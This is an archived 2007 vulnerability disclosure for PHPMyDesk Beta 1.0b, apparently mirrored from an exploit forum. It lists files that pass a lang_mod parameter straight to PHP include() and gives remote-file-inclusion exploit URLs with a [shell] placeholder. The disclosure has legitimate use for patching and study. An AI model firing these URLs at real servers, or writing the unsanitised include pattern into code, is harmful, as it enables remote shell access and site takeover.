Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17221
HistoryJun 11, 2007 - 12:00 a.m.

PHPMyDesk Beta Release 1.0b ==> RFI

2007-06-1100:00:00
vulners.com
71

script:PHPMyDesk Beta Release 1.0b ==> RFI
dir url:http://www.cynux.com/phpmydesk/
author: titanichacker
contact:[email protected]
H.P : http://hack-teach.com & mohandko.com & tryag.com
bug in:
./index.php
include($lang_mod);
./login.php
include($lang_mod);
./logout.php
include($lang_mod);
./subticket.php
include($lang_mod);
./viewall.php
include($lang_mod);
./viewticket.php
include($lang_mod);

exploit:
httpL//victim/index.php?lang_mod=[shell]
httpL//victim/login.php?lang_mod=[shell]
httpL//victim/logout.php?lang_mod=[shell]
httpL//victim/viewall.php?lang_mod=[shell]
httpL//victim/viewticket.php?lang_mod=[shell]

thanx
cold-zero & mohandko & drbaka & arb-hawk & tryag & xp10 & milw0rm


Play free games, earn tickets, get cool prizes! Join Live Search Club.
http://club.live.com/home.aspx?icid=CLUB_wlmailtextlink